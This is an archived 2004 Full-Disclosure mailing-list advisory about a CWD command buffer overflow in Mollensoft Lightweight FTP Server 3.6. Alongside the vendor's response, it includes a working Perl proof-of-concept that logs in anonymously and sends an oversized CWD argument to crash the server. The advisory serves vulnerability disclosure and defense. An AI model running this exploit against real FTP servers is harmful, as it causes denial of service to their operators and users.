[Full-Disclosure] Mollensoft Lightweight FTP Server CWD Buffer Overflow

• Previous message: Axel Pettinger: "Re: [Full-Disclosure] Beware of 'IBM laptop order' email"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: full-disclosure@lists.netsys.com
Date: Tue, 1 Jun 2004 20:12:55 +0300

Mollensoft Lightweight FTP Server CWD Buffer Overflow
------------------------------------------------------------------------

Article reference:
http://www.securiteam.com/windowsntfocus/5RP0L15CUM.html

SUMMARY

STORM has discovered a security vulnerability in
<http://www.mollensoft.com/product2.htm> Mollensoft Lightweight FTP Server.
Mollensoft Lightweight FTP Server's support for the CWD command incorrectly
verifies that the buffer the CWD command doesn't overflow any of its internal
buffers. This insufficient verification allows an authenticated (anonymous or
otherwise) user to cause the FTP server to crash while trying to read an
arbitrary memory location by issuing a malformed CWD command.

DETAILS

Vulnerable Systems:
 * Mollensoft Lightweight FTP Server version 3.6

 Vendor Response:
BigAl (author) responded with the following:
I wrote this particular app with Visual Basic and used an FTP ActiveX COM
component and I am waiting for the component creator to get back to me
regarding the fix. Unfortunately I cannot snip off any of the commands, as
access to the command length is not available from the VB component using
straight VB Code. I am working on moving to .Net so hopefully I can have a
new FTP server out by fall time frame which is truly multi-threaded and
totally coded by me.
 
 Exploit:
 #!/usr/bin/perl
 #
 # Mollensoft FTP Server CMD Buffer Overflow
 #
 # Orkut users? Come join the SecuriTeam community
 # http://www.orkut.com/Community.aspx?cmm=44441
 
 use strict;
 use IO::Socket::INET;
 
 usage() unless (@ARGV == 2);
 
 my $host = shift(@ARGV);
 my $port = shift(@ARGV);
 
 # create the socket
 my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
 $socket or die "Cannot connect to host!\n";
 
 $socket->autoflush(1);
 
 # receive greeting
 my $repcode = "220 ";
 my $response = recv_reply($socket, $repcode);
 print $response;
 
 # send USER command
 #my $username = "%00" x 2041;
 my $username = "anonymous";
 print "USER $username\r\n";
 print $socket "USER $username\r\n";
 
 select(undef, undef, undef, 0.002); # sleep of 2 milliseconds
 
 # send PASS command
 my $password = "a\@b.com";
 print "PASS $password\r\n";
 print $socket "PASS $password\r\n";
 
 my $cmd = "CWD ";
 $cmd .= "A" x 224; # Value can range from 224 to 1018
 $cmd .= "\r\n";
 print "length: ".length($cmd)."\n";
 print $socket $cmd;
 
 $repcode = "";
 recv_reply($socket, $repcode);
 
 close($socket);
 exit(0);
 
 sub usage
 {
  # print usage information
  print "\nUsage: Mollensoft_FTP_Server_crash.pl <host> <port>\n
 <host> - The host to connect to
 <port> - The TCP port which WarFTP is listening on\n\n";
  exit(1);
 }
 
 sub recv_reply
 {
  # retrieve any reply
  my $socket = shift;
  my $repcode = shift;
  $socket or die "Can't receive on socket\n";
   
  my $res="";
  while(<$socket>)
  {
   $res .= $_;
   if (/$repcode/) { last; }
  }
  return $res;
 }
 

ADDITIONAL INFORMATION
SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
finding this vulnerability.

Regards,
Aviram Jenik
Beyond Security Ltd.

http://www.BeyondSecurity.com
http://www.SecuriTeam.com

The First Integrated Network and Web Application Vulnerability Scanner:
http://www.beyondsecurity.com/webscan-wp.pdf

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Previous message: Axel Pettinger: "Re: [Full-Disclosure] Beware of 'IBM laptop order' email"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Mollensoft Lightweight FTP Server CWD Buffer Overflow ... Mollensoft Lightweight FTP Server CWD Buffer Overflow ... Mollensoft Lightweight FTP Server's support for the CWD command incorrectly ... finding this vulnerability. ... (Bugtraq) [VulnWatch] Mollensoft Lightweight FTP Server CWD Buffer Overflow ... Mollensoft Lightweight FTP Server CWD Buffer Overflow ... Mollensoft Lightweight FTP Server's support for the CWD command incorrectly ... finding this vulnerability. ... (VulnWatch) SecurityFocus Microsoft Newsletter #112 ... MICROSOFT VULNERABILITY SUMMARY ... Northern Solutions Xeneo Web Server Denial Of Service Vulnerability ... Pablo Software Solutions FTP Server Format String Vulnerability ... NEW PRODUCTS FOR MICROSOFT PLATFORMS ... (Focus-Microsoft) [NT] FTPServer/X Response Buffer Overflow Vulnerability ... to promote the most advanced vulnerability assessment solutions today. ... has been identified in FTPServer/X, which can be exploited by malicious ... * FTPServer/X - FTP Server Control and COM Object version 1.00.046 ... 11/04/2003 - Vendor notified. ... (Securiteam) SecurityFocus Microsoft Newsletter #290 ... Microsoft Infotech Storage Library Heap Corruption Vulnerability ... Intervations FileCopa User Command Remote Buffer Overflow Vulnerability ... XM Easy Personal FTP Server Unspecified Authentication Buffer Overflow Vulnerability ... (Focus-Microsoft)